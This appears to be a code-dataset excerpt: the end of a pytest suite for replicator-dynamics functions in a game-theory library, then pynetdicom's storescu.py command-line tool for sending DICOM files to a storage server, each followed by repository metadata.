-5.07366023e-11, 9.99999999e-01], [-1.56239261e-11, -3.63303742e-11, -4.54907255e-11, 9.99999999e-01], [-1.52023171e-11, -3.53629278e-11, -4.42631659e-11, 9.99999999e-01], [-1.47807080e-11, -3.43954813e-11, -4.30356063e-11, 9.99999999e-01], [-1.43590990e-11, -3.34280348e-11, -4.18080466e-11, 9.99999999e-01], [-1.39374900e-11, -3.24605883e-11, -4.05804870e-11, 9.99999999e-01], [-1.35158810e-11, -3.14931418e-11, -3.93529274e-11, 9.99999999e-01], [-1.30942720e-11, -3.05256954e-11, -3.81253678e-11, 9.99999999e-01], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_4_example_2(): M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) y0 = np.array([0.6, 0.1, 0.2, 0.1]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [6.00000000e-01, 1.00000000e-01, 2.00000000e-01, 1.00000000e-01], [5.80420179e-01, 1.02112104e-01, 2.26438063e-01, 9.10296545e-02], [5.60703224e-01, 1.02764556e-01, 2.53803256e-01, 8.27289637e-02], [5.41167086e-01, 1.01977465e-01, 2.81742410e-01, 7.51130396e-02], [5.22074545e-01, 9.98438659e-02, 3.09908715e-01, 6.81728742e-02], [5.03628230e-01, 9.65147322e-02, 3.37975461e-01, 6.18815768e-02], [4.85972882e-01, 9.21809929e-02, 3.65645769e-01, 5.62003554e-02], [4.69202136e-01, 8.70552790e-02, 3.92658949e-01, 5.10836358e-02], [4.53367471e-01, 8.13554217e-02, 4.18794068e-01, 4.64830393e-02], [4.38487551e-01, 7.52909495e-02, 4.43871296e-01, 4.23502030e-02], [4.24556757e-01, 6.90530159e-02, 4.67751586e-01, 3.86386415e-02], [4.11552390e-01, 6.28078193e-02, 4.90334955e-01, 3.53048365e-02], [3.99440406e-01, 5.66931176e-02, 5.11557695e-01, 3.23087817e-02], [3.88179692e-01, 5.08174781e-02, 5.31388695e-01, 2.96141349e-02], [3.77725273e-01, 4.52612790e-02, 5.49825265e-01, 2.71881840e-02], [3.68030476e-01, 4.00793316e-02, 5.66888559e-01, 2.50016336e-02], [3.59048444e-01, 3.53042210e-02, 5.82618984e-01, 2.30283506e-02], [3.50733127e-01, 
3.09500459e-02, 5.97071747e-01, 2.12450802e-02], [3.43039913e-01, 2.70161764e-02, 6.10312748e-01, 1.96311622e-02], [3.35926019e-01, 2.34907933e-02, 6.22414927e-01, 1.81682605e-02], [3.29350717e-01, 2.03540183e-02, 6.33455151e-01, 1.68401144e-02], [3.23275448e-01, 1.75806009e-02, 6.43511642e-01, 1.56323094e-02], [3.17663866e-01, 1.51421124e-02, 6.52661949e-01, 1.45320720e-02], [3.12481831e-01, 1.30086774e-02, 6.60981407e-01, 1.35280845e-02], [3.07697368e-01, 1.11502875e-02, 6.68542025e-01, 1.26103192e-02], [3.03280608e-01, 9.53775700e-03, 6.75411745e-01, 1.17698907e-02], [2.99203707e-01, 8.14336365e-03, 6.81654005e-01, 1.09989243e-02], [2.95440763e-01, 6.94128233e-03, 6.87327517e-01, 1.02904379e-02], [2.91967717e-01, 5.90780631e-03, 6.92486238e-01, 9.63823834e-03], [2.88762258e-01, 5.02143667e-03, 6.97179477e-01, 9.03682838e-03], [2.85803721e-01, 4.26287314e-03, 7.01452081e-01, 8.48132511e-03], [2.83072986e-01, 3.61493852e-03, 7.05344689e-01, 7.96738728e-03], [2.80552380e-01, 3.06245306e-03, 7.08894015e-01, 7.49115128e-03], [2.78225583e-01, 2.59208318e-03, 7.12133159e-01, 7.04917476e-03], [2.76077528e-01, 2.19217981e-03, 7.15091905e-01, 6.63838682e-03], [2.74094319e-01, 1.85260717e-03, 7.17797029e-01, 6.25604450e-03], [2.72263140e-01, 1.56458788e-03, 7.20272578e-01, 5.89969385e-03], [2.70572180e-01, 1.32054238e-03, 7.22540141e-01, 5.56713642e-03], [2.69010552e-01, 1.11394543e-03, 7.24619103e-01, 5.25639953e-03], [2.67568225e-01, 9.39195127e-04, 7.26526869e-01, 4.96571001e-03], [2.66235959e-01, 7.91492823e-04, 7.28279077e-01, 4.69347140e-03], [2.65005238e-01, 6.66737179e-04, 7.29889781e-01, 4.43824386e-03], [2.63868220e-01, 5.61428279e-04, 7.31371625e-01, 4.19872636e-03], [2.62817677e-01, 4.72584699e-04, 7.32735997e-01, 3.97374121e-03], [2.61846950e-01, 3.97670564e-04, 7.33993159e-01, 3.76222045e-03], [2.60949904e-01, 3.34531655e-04, 7.35152371e-01, 3.56319374e-03], [2.60120883e-01, 2.81339801e-04, 7.36222000e-01, 3.37577783e-03], [2.59354674e-01, 2.36545608e-04, 7.37209613e-01, 3.19916730e-03], [2.58646473e-01, 1.98836743e-04, 7.38122064e-01, 3.03262621e-03], [2.57991847e-01, 1.67102937e-04, 7.38965569e-01, 2.87548099e-03], [2.57386712e-01, 1.40406606e-04, 7.39745767e-01, 2.72711416e-03], [2.56827297e-01, 1.17953508e-04, 7.40467791e-01, 2.58695819e-03], [2.56310127e-01, 9.90745170e-05, 7.41136308e-01, 2.45449105e-03], [2.55831991e-01, 8.32032628e-05, 7.41755574e-01, 2.32923122e-03], [2.55389930e-01, 6.98644087e-05, 7.42329471e-01, 2.21073444e-03], [2.54981210e-01, 5.86559924e-05, 7.42861544e-01, 2.09858959e-03], [2.54603308e-01, 4.92394766e-05, 7.43355037e-01, 1.99241593e-03], [2.54253894e-01, 4.13300061e-05, 7.43812916e-01, 1.89186027e-03], [2.53930817e-01, 3.46872608e-05, 7.44237902e-01, 1.79659435e-03], [2.53632090e-01, 2.91099509e-05, 7.44632487e-01, 1.70631297e-03], [2.53355875e-01, 2.44261534e-05, 7.44998968e-01, 1.62073123e-03], [2.53100479e-01, 2.04943791e-05, 7.45339443e-01, 1.53958396e-03], [2.52864331e-01, 1.71936064e-05, 7.45655852e-01, 1.46262303e-03], [2.52645987e-01, 1.44237080e-05, 7.45949973e-01, 1.38961674e-03], [2.52444104e-01, 1.20990188e-05, 7.46223449e-01, 1.32034782e-03], [2.52257447e-01, 1.01486469e-05, 7.46477791e-01, 1.25461296e-03], [2.52084872e-01, 8.51182213e-06, 7.46714395e-01, 1.19222110e-03], [2.51925320e-01, 7.13869064e-06, 7.46934548e-01, 1.13299311e-03], [2.51777814e-01, 5.98662919e-06, 7.47139439e-01, 1.07676038e-03], [2.51641450e-01, 5.02038939e-06, 7.47330165e-01, 1.02336449e-03], [2.51515390e-01, 4.20987155e-06, 7.47507744e-01, 9.72656120e-04], 
[2.51398863e-01, 3.53027631e-06, 7.47673112e-01, 9.24494781e-04], [2.51291152e-01, 2.96001271e-06, 7.47827141e-01, 8.78747738e-04], [2.51191595e-01, 2.48172331e-06, 7.47970634e-01, 8.35290020e-04], [2.51099580e-01, 2.08057621e-06, 7.48104336e-01, 7.94003505e-04], [2.51014541e-01, 1.74422498e-06, 7.48228938e-01, 7.54776690e-04], [2.50935955e-01, 1.46226491e-06, 7.48345078e-01, 7.17504179e-04], [2.50863336e-01, 1.22585116e-06, 7.48453351e-01, 6.82086278e-04], [2.50796237e-01, 1.02769432e-06, 7.48554306e-01, 6.48428765e-04], [2.50734243e-01, 8.61444851e-07, 7.48648453e-01, 6.16442360e-04], [2.50676969e-01, 7.22075292e-07, 7.48736266e-01, 5.86042659e-04], [2.50624061e-01, 6.05224449e-07, 7.48818184e-01, 5.57149616e-04], [2.50575191e-01, 5.07304773e-07, 7.48894614e-01, 5.29687483e-04], [2.50530054e-01, 4.25231575e-07, 7.48965936e-01, 5.03584414e-04], [2.50488370e-01, 3.56536646e-07, 7.49032501e-01, 4.78772412e-04], [2.50449879e-01, 2.99072838e-07, 7.49094635e-01, 4.55186947e-04], [2.50414339e-01, 2.50787707e-07, 7.49152643e-01, 4.32766625e-04], [2.50381527e-01, 2.09990839e-07, 7.49206810e-01, 4.11453246e-04], [2.50351237e-01, 1.75740049e-07, 7.49257395e-01, 3.91191937e-04], [2.50323280e-01, 1.46960312e-07, 7.49304642e-01, 3.71930334e-04], [2.50297478e-01, 1.22681547e-07, 7.49348781e-01, 3.53618629e-04], [2.50273668e-01, 1.02313601e-07, 7.49390020e-01, 3.36209829e-04], [2.50251700e-01, 8.53321199e-08, 7.49428555e-01, 3.19659221e-04], [2.50231434e-01, 7.12334339e-08, 7.49464570e-01, 3.03924199e-04], [2.50212740e-01, 5.95800286e-08, 7.49498236e-01, 2.88964386e-04], [2.50195501e-01, 4.99771822e-08, 7.49529708e-01, 2.74741555e-04], [2.50179604e-01, 4.19815889e-08, 7.49559135e-01, 2.61219233e-04], [2.50164947e-01, 3.51538946e-08, 7.49586655e-01, 2.48362728e-04], [2.50151436e-01, 2.93685983e-08, 7.49612395e-01, 2.36139268e-04], [2.50138985e-01, 2.44612938e-08, 7.49636473e-01, 2.24517619e-04], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_4_default_y0_example_1(): M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [2.50000000e-01, 2.50000000e-01, 2.50000000e-01, 2.50000000e-01], [2.41719166e-01, 2.35735156e-01, 2.53873636e-01, 2.68672042e-01], [2.32546984e-01, 2.21360179e-01, 2.55769777e-01, 2.90323060e-01], [2.22291827e-01, 2.06871196e-01, 2.55261786e-01, 3.15575190e-01], [2.10731484e-01, 1.92233270e-01, 2.51864185e-01, 3.45171061e-01], [1.97619659e-01, 1.77375409e-01, 2.45043522e-01, 3.79961410e-01], [1.82707977e-01, 1.62190468e-01, 2.34255381e-01, 4.20846174e-01], [1.65796132e-01, 1.46547147e-01, 2.19029301e-01, 4.68627420e-01], [1.46825571e-01, 1.30325960e-01, 1.99128685e-01, 5.23719784e-01], [1.26021893e-01, 1.13492486e-01, 1.74796565e-01, 5.85689056e-01], [1.04051013e-01, 9.62074113e-02, 1.47031763e-01, 6.52709813e-01], [8.20816740e-02, 7.89301100e-02, 1.17717959e-01, 7.21270257e-01], [6.16068147e-02, 6.24180199e-02, 8.93556151e-02, 7.86619550e-01], [4.39995702e-02, 4.75413069e-02, 6.43425051e-02, 8.44116618e-01], [3.00443142e-02, 3.49797125e-02, 4.41856313e-02, 8.90790342e-01], [1.97703777e-02, 2.50057355e-02, 2.91865133e-02, 9.26037374e-01], [1.26494877e-02, 1.74854076e-02, 1.87200451e-02, 9.51145060e-01], [7.93309603e-03, 1.20349937e-02, 1.17584783e-02, 9.68273432e-01], [4.90797650e-03, 8.19467468e-03, 7.28166293e-03, 9.79615686e-01], [3.00928572e-03, 5.54018743e-03, 4.46734830e-03, 9.86983179e-01], 
[1.83444440e-03, 3.72835899e-03, 2.72426145e-03, 9.91712935e-01], [1.11413336e-03, 2.50170133e-03, 1.65492179e-03, 9.94729244e-01], [6.75070430e-04, 1.67550183e-03, 1.00287691e-03, 9.96646551e-01], [4.08428511e-04, 1.12084196e-03, 6.06805960e-04, 9.97863924e-01], [2.46874544e-04, 7.49242911e-04, 3.66801756e-04, 9.98637081e-01], [1.49135183e-04, 5.00608887e-04, 2.21588946e-04, 9.99128667e-01], [9.00578701e-05, 3.34385059e-04, 1.33812730e-04, 9.99441744e-01], [5.43699910e-05, 2.23313206e-04, 8.07866707e-05, 9.99641530e-01], [3.28200257e-05, 1.49118817e-04, 4.87665696e-05, 9.99769295e-01], [1.98098290e-05, 9.95680219e-05, 2.94351134e-05, 9.99851187e-01], [1.19560257e-05, 6.64791103e-05, 1.77653131e-05, 9.99903800e-01], [7.21588878e-06, 4.43855409e-05, 1.07220167e-05, 9.99937677e-01], [4.35460889e-06, 2.96335830e-05, 6.47047541e-06, 9.99959541e-01], [2.62795277e-06, 1.97844865e-05, 3.90485418e-06, 9.99973683e-01], [1.58581836e-06, 1.32085926e-05, 2.35635571e-06, 9.99982849e-01], [9.57098845e-07, 8.81857690e-06, 1.42214629e-06, 9.99988802e-01], [5.77181917e-07, 5.88651878e-06, 8.57630601e-07, 9.99992679e-01], [3.48017960e-07, 3.92912327e-06, 5.17117549e-07, 9.99995206e-01], [2.10432900e-07, 2.62354883e-06, 3.12680828e-07, 9.99996853e-01], [1.27160084e-07, 1.75168432e-06, 1.88946318e-07, 9.99997932e-01], [7.69138599e-08, 1.17045061e-06, 1.14285800e-07, 9.99998638e-01], [4.67857994e-08, 7.82807429e-07, 6.95187050e-08, 9.99999101e-01], [2.81940356e-08, 5.22518381e-07, 4.18933223e-08, 9.99999407e-01], [1.66353720e-08, 3.46827263e-07, 2.47183847e-08, 9.99999612e-01], [9.92969426e-09, 2.31604309e-07, 1.47544662e-08, 9.99999744e-01], [5.86008245e-09, 1.52926389e-07, 8.70745685e-09, 9.99999833e-01], [3.61260541e-09, 1.01921785e-07, 5.36794489e-09, 9.99999889e-01], [2.35820495e-09, 6.89433682e-08, 3.50403969e-09, 9.99999925e-01], [1.54512934e-09, 4.67336874e-08, 2.29589660e-09, 9.99999949e-01], [9.91566874e-10, 3.15653821e-08, 1.47336228e-09, 9.99999966e-01], [6.23213391e-10, 2.13755295e-08, 9.26028545e-10, 9.99999977e-01], [3.89169337e-10, 1.45088069e-08, 5.78264090e-10, 9.99999985e-01], [2.44232046e-10, 9.82444655e-09, 3.62902722e-10, 9.99999990e-01], [1.55958046e-10, 6.64441716e-09, 2.31736960e-10, 9.99999993e-01], [1.01833748e-10, 4.50886059e-09, 1.51314038e-10, 9.99999995e-01], [6.61625623e-11, 3.05585415e-09, 9.83104808e-11, 9.99999997e-01], [4.22829112e-11, 2.06460089e-09, 6.28278830e-11, 9.99999998e-01], [2.66805156e-11, 1.40000880e-09, 3.96443958e-11, 9.99999999e-01], [1.67673488e-11, 9.49807666e-10, 2.49144894e-11, 9.99999999e-01], [1.05528316e-11, 6.42239872e-10, 1.56803796e-11, 9.99999999e-01], [2.03838562e-12, 2.61718511e-10, 3.02882291e-12, 1.00000000e00], [-4.66662938e-12, -4.40298241e-11, -6.93411260e-12, 1.00000000e00], [-9.48563948e-12, -2.72252392e-10, -1.40946462e-11, 1.00000000e00], [-1.24186447e-11, -4.22949193e-10, -1.84527780e-11, 1.00000000e00], [-1.34656449e-11, -4.96120226e-10, -2.00085079e-11, 1.00000000e00], [-1.26266403e-11, -4.91765491e-10, -1.87618360e-11, 1.00000000e00], [-9.90163080e-12, -4.09884990e-10, -1.47127621e-11, 1.00000000e00], [-9.10831756e-12, -3.98815250e-10, -1.35339828e-11, 9.99999999e-01], [-9.61446910e-12, -4.33990960e-10, -1.42860696e-11, 9.99999999e-01], [-9.68711978e-12, -4.48077852e-10, -1.43940204e-11, 9.99999999e-01], [-9.32626962e-12, -4.41075926e-10, -1.38578353e-11, 9.99999999e-01], [-8.53191859e-12, -4.12985183e-10, -1.26775142e-11, 9.99999999e-01], [-7.30406672e-12, -3.63805622e-10, -1.08530573e-11, 9.99999999e-01], [-5.64271399e-12, 
-2.93537243e-10, -8.38446446e-12, 9.99999999e-01], [-3.76042064e-12, -2.46757395e-10, -5.58757547e-12, 9.99999998e-01], [-3.34138439e-12, -2.20697822e-10, -4.96493302e-12, 9.99999999e-01], [-2.92234814e-12, -1.94638250e-10, -4.34229056e-12, 9.99999999e-01], [-2.50331189e-12, -1.68578677e-10, -3.71964811e-12, 9.99999999e-01], [-2.08427564e-12, -1.42519105e-10, -3.09700565e-12, 9.99999999e-01], [-1.66523938e-12, -1.16459532e-10, -2.47436319e-12, 9.99999999e-01], [-1.24620313e-12, -9.03999598e-11, -1.85172074e-12, 9.99999999e-01], [-8.29582639e-13, -6.44890104e-11, -1.23266784e-12, 9.99999999e-01], [-8.11410998e-13, -6.30915593e-11, -1.20566680e-12, 9.99999999e-01], [-7.93239357e-13, -6.16941082e-11, -1.17866576e-12, 9.99999999e-01], [-7.75067715e-13, -6.02966571e-11, -1.15166472e-12, 9.99999999e-01], [-7.56896074e-13, -5.88992060e-11, -1.12466368e-12, 9.99999999e-01], [-7.38724433e-13, -5.75017549e-11, -1.09766264e-12, 9.99999999e-01], [-7.20552791e-13, -5.61043038e-11, -1.07066160e-12, 9.99999999e-01], [-7.02381150e-13, -5.47068527e-11, -1.04366056e-12, 9.99999999e-01], [-6.84209509e-13, -5.33094016e-11, -1.01665952e-12, 9.99999999e-01], [-6.66037867e-13, -5.19119505e-11, -9.89658484e-13, 9.99999999e-01], [-6.47866226e-13, -5.05144994e-11, -9.62657445e-13, 9.99999999e-01], [-6.29694585e-13, -4.91170483e-11, -9.35656406e-13, 9.99999999e-01], [-6.11522943e-13, -4.77195972e-11, -9.08655366e-13, 9.99999999e-01], [-5.93351302e-13, -4.63221461e-11, -8.81654327e-13, 9.99999999e-01], [-5.75179661e-13, -4.49246950e-11, -8.54653288e-13, 9.99999999e-01], [-5.57008019e-13, -4.35272439e-11, -8.27652249e-13, 9.99999999e-01], [-5.38836378e-13, -4.21297928e-11, -8.00651210e-13, 9.99999999e-01], [-5.20664737e-13, -4.07323417e-11, -7.73650170e-13, 9.99999999e-01], [-5.02493095e-13, -3.93348906e-11, -7.46649131e-13, 9.99999999e-01], ] ) xs = replicator_dynamics(timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_with_incorrect_inputs(): """ Test that if an incorrect starting value is given, an error is raised """ M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) y0 = np.array([1, 0, 0]) with pytest.raises(ValueError): replicator_dynamics(y0=y0, A=M) @given(A=arrays(np.int8, (3, 2)), B=arrays(np.int8, (3, 2))) def test_property_get_derivative_of_asymmetric_fitness(A, B): """ Property-based test of get_derivative_of_asymmetric_fitness for a 3x2 game """ t = 0 x = np.ones(A.shape[1] + A.shape[0]) derivative_of_fitness = get_derivative_of_asymmetric_fitness(x, t, A, B) assert len(derivative_of_fitness) == len(x) def test_get_derivative_of_asymmetric_fitness_example(): """ Test for the asymmetric derivative of fitness function """ M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) N = np.array([[1, 2, 3], [3, 2, 1], [2, 1, 3]]) x_values = ( np.array([1, 0, 0, 1, 0, 0]), np.array([1 / 2, 1 / 2, 0, 1 / 2, 1 / 2, 0]), np.array([0, 1 / 4, 3 / 4, 0, 1 / 4, 3 / 4]), np.array([1 / 5, 2 / 5, 2 / 5, 1 / 5, 2 / 5, 2 / 5]), np.array([1 / 2, 0, 1 / 2, 1 / 2, 0, 1 / 2]), np.array([2 / 4, 1 / 4, 1 / 4, 2 / 4, 1 / 4, 1 / 4]), ) derivative_values = ( np.array([0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 0, 0, 0]), np.array([0.0, -0.09375, 0.09375, 0.0, -0.234375, 0.234375]), np.array([0.128, -0.144, 0.016, 0.048, -0.144, 0.096]), np.array([0.375, 0.0, -0.375, -0.375, 0.0, 0.375]), np.array([0.125, 0.0, -0.125, -0.09375, -0.046875, 0.140625]), ) for x_value, expected_derivative in zip(x_values, derivative_values): derivative = 
get_derivative_of_asymmetric_fitness(x=x_value, t=0, A=M, B=N) assert np.allclose(derivative, expected_derivative), x_value @settings(max_examples=10) @given( A=arrays(np.int8, (4, 2), elements=integers(0, 100)), B=arrays(np.int8, (4, 2), elements=integers(0, 100)), ) def test_property_of_output_dimension_for_asymmetric_games_of_size_4_2(A, B): """ Property-based test of asymmetric_replicator_dynamics for a 4x2 game """ xs1, xs2 = asymmetric_replicator_dynamics(A, B) assert all(len(x) == 4 for x in xs1) assert all(len(x) == 2 for x in xs2) @given(A=arrays(np.int8, shape=(2, 2), elements=integers(1, 5))) def test_equivalence_between_symmetric_and_asymmetric_replicator_dynamics(A): """ Tests that when we have two populations with identical strategies then the output of the asymmetric_replicator_dynamics for both populations is the same as using just one population in replicator_dynamics. The test is carried out for 2x2 matrices with elements from 1-5. Note that hypothesis can find cases where this test can fail for larger elements or larger matrix sizes. One potential reason for this might be the fact that scipy.odeint() is a deprecated function. """ B = A.transpose() symmetric_xs = replicator_dynamics(A) asymmetric_row_xs, asymmetric_col_xs = asymmetric_replicator_dynamics(A, B) assert np.allclose(asymmetric_row_xs, asymmetric_col_xs, atol=1e-3) assert np.allclose(symmetric_xs, asymmetric_row_xs, atol=1e-3) assert np.allclose(symmetric_xs, asymmetric_col_xs, atol=1e-3) def test_asymmetric_replicator_dynamics_size_2_3_default_values(): """ Test the asymmetric replicator dynamics function for a 2x3 game by using the default values """ A = np.array([[1, 2, 3], [4, 5, 6]]) B = np.array([[7, 8, 9], [10, 11, 12]]) xs_A, xs_B = asymmetric_replicator_dynamics(A, B) assert np.allclose(xs_A[1], np.array([0.49249308, 0.50750692]), atol=1e-5) assert np.allclose(xs_A[-1], np.array([9.33624531e-14, 1]), atol=1e-5) assert np.allclose( xs_B[1], np.array([0.33000229, 0.3333222, 0.33667551]), atol=1e-5 ) assert np.allclose( xs_B[-1], np.array([2.04812640e-09, 4.53898590e-05, 9.99954607e-01]), atol=1e-5, ) def test_asymmetric_replicator_dynamics_size_2_3_given_timepoints(): """ Test the asymmetric replicator dynamics function for a 2x3 game and not using the default timepoints """ timepoints = np.linspace(0, 100, 100) A = np.array([[1, 1, 2], [2, 3, 2]]) B = np.array([[1, 2, 2], [2, 1, 3]]) xs_A, xs_B = asymmetric_replicator_dynamics(A, B, timepoints=timepoints) assert np.allclose(xs_A[1], np.array([0.30904906, 0.69095094])) assert np.allclose(xs_B[1], np.array([0.2196786, 0.1771107, 0.6032107])) assert np.allclose(xs_A[-1], np.array([0.2, 0.8])) assert np.allclose(xs_B[-1], np.array([-6.57013390e-14, 2.92761632e-17, 1])) def test_asymmetric_replicator_dynamics_size_4_6_given_x0_y0(): """ Test the asymmetric replicator dynamics function for a 4x6 game by specifying values for x0 and y0 """ A = np.array( [ [1, 20, 23, 21, 15, 4], [9, 29, 0, 14, 19, 27], [22, 28, 30, 12, 3, 25], [5, 16, 8, 17, 11, 18], ] ) B = np.array( [ [11, 39, 27, 15, 36, 35], [1, 31, 2, 18, 10, 19], [21, 38, 8, 24, 40, 32], [22, 37, 25, 7, 30, 0], ] ) x0 = np.array([0.5, 0.2, 0.2, 0.1]) y0 = np.array([0.4, 0.1, 0.1, 0.1, 0.2, 0.1]) xs_A, xs_B = asymmetric_replicator_dynamics(A, B, x0=x0, y0=y0) assert np.allclose( xs_A[1], np.array([0.48729326, 0.20349646, 0.21191178, 0.0972985]) ) assert np.allclose( xs_A[-1], np.array([-2.50483397e-15, 9.99977992e-01, 2.20078313e-05, 1.18367977e-17]), ) assert np.allclose( xs_B[1], np.array( [
0.36455939, 0.11688505, 0.096508, 0.09537898, 0.22015362, 0.10651496, ] ), ) assert np.allclose( xs_B[-1], np.array( [ 4.58211507e-12, 1.00000000e00, 8.73932312e-12, 1.58763628e-18, -1.22965529e-14, -9.91094095e-17, ] ), )
mit
8,769,032,210,956,131,000
47.587363
84
0.561769
false
2.281732
true
false
false
scaramallion/pynetdicom
pynetdicom/apps/storescu/storescu.py
1
9028
#!/usr/bin/env python """A Storage SCU application. Used for transferring DICOM SOP Instances to a Storage SCP. """ import argparse import os from pathlib import Path import sys from pydicom import dcmread from pydicom.errors import InvalidDicomError from pydicom.uid import ( ExplicitVRLittleEndian, ImplicitVRLittleEndian, ExplicitVRBigEndian, DeflatedExplicitVRLittleEndian ) from pynetdicom import AE, StoragePresentationContexts from pynetdicom.apps.common import setup_logging, get_files from pynetdicom._globals import DEFAULT_MAX_LENGTH from pynetdicom.status import STORAGE_SERVICE_CLASS_STATUS __version__ = '0.3.0' def _setup_argparser(): """Setup the command line arguments""" # Description parser = argparse.ArgumentParser( description=( "The storescu application implements a Service Class User " "(SCU) for the Storage Service Class. For each DICOM " "file on the command line it sends a C-STORE message to a " "Storage Service Class Provider (SCP) and waits for a response." ), usage="storescu [options] addr port path" ) # Parameters req_opts = parser.add_argument_group('Parameters') req_opts.add_argument( "addr", help="TCP/IP address or hostname of DICOM peer", type=str ) req_opts.add_argument("port", help="TCP/IP port number of peer", type=int) req_opts.add_argument( "path", metavar="path", nargs='+', help="DICOM file or directory to be transmitted", type=str ) # General Options gen_opts = parser.add_argument_group('General Options') gen_opts.add_argument( "--version", help="print version information and exit", action="store_true" ) output = gen_opts.add_mutually_exclusive_group() output.add_argument( "-q", "--quiet", help="quiet mode, print no warnings and errors", action="store_const", dest='log_type', const='q' ) output.add_argument( "-v", "--verbose", help="verbose mode, print processing details", action="store_const", dest='log_type', const='v' ) output.add_argument( "-d", "--debug", help="debug mode, print debug information", action="store_const", dest='log_type', const='d' ) gen_opts.add_argument( "-ll", "--log-level", metavar='[l]', help=( "use level l for the logger (critical, error, warn, info, debug)" ), type=str, choices=['critical', 'error', 'warn', 'info', 'debug'] ) # Input Options in_opts = parser.add_argument_group('Input Options') in_opts.add_argument( '-r', '--recurse', help="recursively search the given directory", action="store_true" ) # Network Options net_opts = parser.add_argument_group('Network Options') net_opts.add_argument( "-aet", "--calling-aet", metavar='[a]etitle', help="set my calling AE title (default: STORESCU)", type=str, default='STORESCU' ) net_opts.add_argument( "-aec", "--called-aet", metavar='[a]etitle', help="set called AE title of peer (default: ANY-SCP)", type=str, default='ANY-SCP' ) net_opts.add_argument( "-ta", "--acse-timeout", metavar='[s]econds', help="timeout for ACSE messages (default: 30 s)", type=float, default=30 ) net_opts.add_argument( "-td", "--dimse-timeout", metavar='[s]econds', help="timeout for DIMSE messages (default: 30 s)", type=float, default=30 ) net_opts.add_argument( "-tn", "--network-timeout", metavar='[s]econds', help="timeout for the network (default: 30 s)", type=float, default=30 ) net_opts.add_argument( "-pdu", "--max-pdu", metavar='[n]umber of bytes', help=( f"set max receive pdu to n bytes (0 for unlimited, " f"default: {DEFAULT_MAX_LENGTH})" ), type=int, default=DEFAULT_MAX_LENGTH ) # Transfer Syntaxes ts_opts = parser.add_argument_group("Transfer Syntax Options") syntax = 
ts_opts.add_mutually_exclusive_group() syntax.add_argument( "-xe", "--request-little", help="request explicit VR little endian TS only", action="store_true" ) syntax.add_argument( "-xb", "--request-big", help="request explicit VR big endian TS only", action="store_true" ) syntax.add_argument( "-xi", "--request-implicit", help="request implicit VR little endian TS only", action="store_true" ) # Misc Options misc_opts = parser.add_argument_group('Miscellaneous Options') misc_opts.add_argument( "-cx", "--required-contexts", help=( "only request the presentation contexts required for the " "input DICOM file(s)" ), action="store_true", ) return parser.parse_args() def get_contexts(fpaths, app_logger): """Return the valid DICOM files and their context values. Parameters ---------- fpaths : list of str A list of paths to the files to try and get data from. Returns ------- list of str, dict A list of paths to valid DICOM files and the {SOP Class UID : [Transfer Syntax UIDs]} that can be used to create the required presentation contexts. """ good, bad = [], [] contexts = {} for fpath in fpaths: path = os.fspath(Path(fpath).resolve()) try: ds = dcmread(path) except Exception as exc: bad.append(('Bad DICOM file', path)) continue try: sop_class = ds.SOPClassUID tsyntax = ds.file_meta.TransferSyntaxUID except Exception as exc: bad.append(('Unknown SOP Class or Transfer Syntax UID', path)) continue tsyntaxes = contexts.setdefault(sop_class, []) if tsyntax not in tsyntaxes: tsyntaxes.append(tsyntax) good.append(path) for (reason, path) in bad: app_logger.error(f"{reason}: {path}") return good, contexts def main(args=None): """Run the application.""" if args is not None: sys.argv = args args = _setup_argparser() if args.version: print(f'storescu.py v{__version__}') sys.exit() APP_LOGGER = setup_logging(args, 'storescu') APP_LOGGER.debug(f'storescu.py v{__version__}') APP_LOGGER.debug('') lfiles, badfiles = get_files(args.path, args.recurse) for bad in badfiles: APP_LOGGER.error(f"Cannot access path: {bad}") ae = AE(ae_title=args.calling_aet) ae.acse_timeout = args.acse_timeout ae.dimse_timeout = args.dimse_timeout ae.network_timeout = args.network_timeout if args.required_contexts: # Only propose required presentation contexts lfiles, contexts = get_contexts(lfiles, APP_LOGGER) try: for abstract, transfer in contexts.items(): for tsyntax in transfer: ae.add_requested_context(abstract, tsyntax) except ValueError: raise ValueError( "More than 128 presentation contexts required with " "the '--required-contexts' flag, please try again " "without it or with fewer files" ) else: # Propose the default presentation contexts if args.request_little: transfer_syntax = [ExplicitVRLittleEndian] elif args.request_big: transfer_syntax = [ExplicitVRBigEndian] elif args.request_implicit: transfer_syntax = [ImplicitVRLittleEndian] else: transfer_syntax = [ ExplicitVRLittleEndian, ImplicitVRLittleEndian, DeflatedExplicitVRLittleEndian, ExplicitVRBigEndian ] for cx in StoragePresentationContexts: ae.add_requested_context(cx.abstract_syntax, transfer_syntax) if not lfiles: APP_LOGGER.warning("No suitable DICOM files found") sys.exit() # Request association with remote assoc = ae.associate( args.addr, args.port, ae_title=args.called_aet, max_pdu=args.max_pdu ) if assoc.is_established: ii = 1 for fpath in lfiles: APP_LOGGER.info(f'Sending file: {fpath}') try: ds = dcmread(fpath) status = assoc.send_c_store(ds, ii) ii += 1 except InvalidDicomError: APP_LOGGER.error(f'Bad DICOM file: {fpath}') except Exception as exc: 
APP_LOGGER.error(f"Store failed: {fpath}") APP_LOGGER.exception(exc) assoc.release() else: sys.exit(1) if __name__ == "__main__": main()
mit
6,390,212,979,904,259,000
29.093333
78
0.588835
false
3.876342
false
false
false
nave91/teak-nbtree
src/rank.py
1
4248
